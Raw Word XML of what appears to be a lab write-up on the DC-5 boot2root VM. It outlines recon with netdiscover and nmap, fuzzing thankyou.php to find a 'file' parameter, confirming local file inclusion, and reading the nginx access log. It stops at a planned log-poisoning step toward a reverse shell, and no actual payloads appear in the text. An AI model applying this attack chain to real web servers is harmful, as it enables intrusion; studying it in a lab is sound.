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7485"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE7808" w14:paraId="3072C1A3" w14:textId="77777777" w:rsidTr="009F798C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61AA5542" w14:textId="02B37EE7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>Machine Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E95B5F8" w14:textId="3CB8ACDE" w:rsidR="009F798C" w:rsidRPr="009F798C" w:rsidRDefault="00D34036">
            <w:p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>DC-5 is a boot2root style VM where initial access is gained through a vulnerable web application and insecure service exposure, leading to remote command execution, credential discovery, and staged local privilege escalation to root.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE7808" w14:paraId="66250358" w14:textId="77777777" w:rsidTr="009F798C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D7B5C30" w14:textId="75AF7CBB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408C6C56" w14:textId="577BF332" w:rsidR="009F798C" w:rsidRPr="009F798C" w:rsidRDefault="002D1209">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1209">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.50.41.35</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE7808" w14:paraId="43A46CCA" w14:textId="77777777" w:rsidTr="009F798C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34FE3A96" w14:textId="4180F08B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181A4A63" w14:textId="0E3768CB" w:rsidR="009F798C" w:rsidRPr="009F798C" w:rsidRDefault="00D340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LFI </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>( Local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> File </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Inclusion )</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> chained with Log Poisoning for RCE </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE7808" w14:paraId="31D44075" w14:textId="77777777" w:rsidTr="009F798C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15EE5D66" w14:textId="0A645023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7481C7A0" w14:textId="3E600773" w:rsidR="009F798C" w:rsidRPr="009F798C" w:rsidRDefault="00D340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 HTTP nginx </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE7808" w14:paraId="3FE4ACD8" w14:textId="77777777" w:rsidTr="009F798C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36B9A1BF" w14:textId="34E7FC36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0A7EDCAE" w14:textId="3DA6501E" w:rsidR="009F798C" w:rsidRPr="009F798C" w:rsidRDefault="00D340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9.8 Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE7808" w14:paraId="470DC939" w14:textId="77777777" w:rsidTr="009F798C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42C7A5B2" w14:textId="61E0FFF3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002C8598" w14:textId="76BB6312" w:rsidR="009F798C" w:rsidRPr="009F798C" w:rsidRDefault="00D34036">
            <w:p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>CVSS:3.0/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AC:L</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PR:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>UI:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>S:U</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE7808" w14:paraId="012FF009" w14:textId="77777777" w:rsidTr="009F798C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B46F9B3" w14:textId="6CD65429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>Proof of Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6239B930" w14:textId="6A567B8E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2D1209">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Discover the target IP using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002D1209">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Netdiscover</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002D1209">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7406B1B5" w14:textId="77777777" w:rsidR="002D1209" w:rsidRDefault="002D1209">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="06190715" w14:textId="6E767E94" w:rsidR="002D1209" w:rsidRDefault="002D1209">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1209">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52E2E342" wp14:editId="6FC0D8A2">
                  <wp:extent cx="4597400" cy="2552065"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
                  <wp:docPr id="79484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8494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16B67" w14:textId="77777777" w:rsidR="009F798C" w:rsidRDefault="009F798C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="25CFE4ED" w14:textId="14510F7C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 –</w:t>
            </w:r>
            <w:r w:rsidR="002D1209">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Looking For Open Ports and services on target using Nmap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19F3B22D" w14:textId="77777777" w:rsidR="002D1209" w:rsidRDefault="002D1209">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="712FCC5E" w14:textId="5655A6B9" w:rsidR="002D1209" w:rsidRDefault="002D1209">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1209">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE9DEA7" wp14:editId="130ECE79">
                  <wp:extent cx="4597400" cy="2493010"/>
                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                  <wp:docPr id="728549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49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249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B6ED" w14:textId="77777777" w:rsidR="009F798C" w:rsidRDefault="009F798C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F217ED4" w14:textId="7D512C44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– </w:t>
            </w:r>
            <w:r w:rsidR="009330FA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Enumerating Port 80 HTTP on target </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B2A0410" w14:textId="77777777" w:rsidR="009330FA" w:rsidRDefault="009330FA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="757F9BEB" w14:textId="7F5D005A" w:rsidR="009330FA" w:rsidRDefault="009330FA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009330FA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DE38059" wp14:editId="1AEB103D">
                  <wp:extent cx="4578350" cy="3204845"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="681991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9915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223F0" w14:textId="77777777" w:rsidR="009330FA" w:rsidRDefault="009330FA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7279431C" w14:textId="46C0B165" w:rsidR="009330FA" w:rsidRDefault="009330FA" w:rsidP="009330F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Look for the files available on server </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A471C9A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3134A802" w14:textId="7CC7962F" w:rsidR="009330FA" w:rsidRDefault="009330FA" w:rsidP="009330FA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009330FA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FD993B2" wp14:editId="38A6070F">
                  <wp:extent cx="4578350" cy="3427730"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="1248985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9850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42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76090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7F578AE8" w14:textId="238B8AF0" w:rsidR="009330FA" w:rsidRDefault="009330FA" w:rsidP="009330F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Found Various files on </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>server  but</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> only </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>contact.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE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have input fields</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12C6AD67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560B6A2F" w14:textId="489D6D04" w:rsidR="009330FA" w:rsidRDefault="009330FA" w:rsidP="009330FA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009330FA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A6C1A3A" wp14:editId="5AE9CF1C">
                  <wp:extent cx="4673600" cy="3168650"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="208645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4534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16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756C9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6ED8EE34" w14:textId="6E3D3DCA" w:rsidR="009330FA" w:rsidRDefault="009330FA" w:rsidP="009330F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if </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>we  view</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> the source </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>code</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> we can see all data is passed to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>thankyou.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="291B3193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3DF10305" w14:textId="3C6EE2C2" w:rsidR="009330FA" w:rsidRDefault="009330FA" w:rsidP="009330FA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009330FA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04FE1155" wp14:editId="0F6236BC">
                  <wp:extent cx="4597400" cy="4596765"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="17022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459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62AFF" w14:textId="77777777" w:rsidR="009330FA" w:rsidRDefault="009330FA" w:rsidP="009330FA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="67C3B992" w14:textId="77777777" w:rsidR="009330FA" w:rsidRPr="009330FA" w:rsidRDefault="009330FA" w:rsidP="009330FA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B01DF6F" w14:textId="77777777" w:rsidR="009F798C" w:rsidRDefault="009F798C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5316F87E" w14:textId="1E014B3A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F0329A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00F0329A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Lets</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00F0329A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> try to find parameters for the endpoint file name </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F0329A" w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>thankyou.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F0329A" w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F0329A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">by fuzzing it </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C26E9BA" w14:textId="77777777" w:rsidR="00F0329A" w:rsidRDefault="00F0329A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2A04D7F9" w14:textId="29ED1513" w:rsidR="00F0329A" w:rsidRDefault="00F0329A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F0329A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="074E4788" wp14:editId="67F8444D">
                  <wp:extent cx="4603750" cy="1689100"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
                  <wp:docPr id="242080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803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01911" w14:textId="77777777" w:rsidR="00F0329A" w:rsidRDefault="00F0329A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4FF4B387" w14:textId="74A010AF" w:rsidR="00F0329A" w:rsidRDefault="00F0329A" w:rsidP="00F0329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</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> we have parameter named ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>file</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77E70E6A" w14:textId="77777777" w:rsidR="00F0329A" w:rsidRDefault="00F0329A" w:rsidP="00F0329A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E501878" w14:textId="5BBEC8EB" w:rsidR="00F0329A" w:rsidRDefault="00F0329A" w:rsidP="00F0329A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F0329A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="412ECDF7" wp14:editId="7CD68FD0">
                  <wp:extent cx="4603750" cy="3643630"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="173957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7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36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DD1D2" w14:textId="77777777" w:rsidR="00F0329A" w:rsidRDefault="00F0329A" w:rsidP="00F0329A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1FB4DB64" w14:textId="77777777" w:rsidR="00F0329A" w:rsidRDefault="00F0329A" w:rsidP="00F0329A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74FB7914" w14:textId="36BE6D0B" w:rsidR="00F0329A" w:rsidRDefault="00F0329A" w:rsidP="00F0329A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F0329A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="426A0534" wp14:editId="3B084805">
                  <wp:extent cx="4603750" cy="1808480"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
                  <wp:docPr id="2829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91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D493D" w14:textId="77777777" w:rsidR="009F798C" w:rsidRDefault="009F798C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="56582255" w14:textId="16A1B6EB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F0329A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> we have </w:t>
            </w:r>
            <w:r w:rsidR="00F0329A" w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>LFI</w:t>
            </w:r>
            <w:r w:rsidR="00353E6A" w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00353E6A" w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>( Local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00353E6A" w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> File </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00353E6A" w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Inclusion )</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00353E6A" w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F0329A" w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F0329A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">here </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17610E20" w14:textId="77777777" w:rsidR="00F0329A" w:rsidRDefault="00F0329A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="00FD5386" w14:textId="5A8DD9D5" w:rsidR="00F0329A" w:rsidRDefault="00F0329A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F0329A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EEA9C05" wp14:editId="20EFD743">
                  <wp:extent cx="4603750" cy="2216150"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="104248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4844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D838F" w14:textId="77777777" w:rsidR="00F0329A" w:rsidRDefault="00F0329A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2528F8E6" w14:textId="0187B78C" w:rsidR="009F798C" w:rsidRDefault="00353E6A" w:rsidP="00353E6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also have access to </w:t>
            </w:r>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/var/log/nginx/access.log</w:t>
            </w:r>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE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which displays logs </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66BC43EE" w14:textId="77777777" w:rsidR="00353E6A" w:rsidRDefault="00353E6A" w:rsidP="00353E6A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5211B0DE" w14:textId="4F6FFF78" w:rsidR="00353E6A" w:rsidRDefault="00353E6A" w:rsidP="00353E6A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16A880C1" wp14:editId="7F88C99C">
                  <wp:extent cx="4603750" cy="3280410"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="168575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57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D851E" w14:textId="77777777" w:rsidR="00353E6A" w:rsidRDefault="00353E6A" w:rsidP="00353E6A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5697FA89" w14:textId="77777777" w:rsidR="00353E6A" w:rsidRPr="00353E6A" w:rsidRDefault="00353E6A" w:rsidP="00353E6A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4985A051" w14:textId="2C25F927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353E6A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> We can try Log Poising to Get Reverse Shell on the target </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CD8B837" w14:textId="77777777" w:rsidR="00353E6A" w:rsidRDefault="00353E6A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
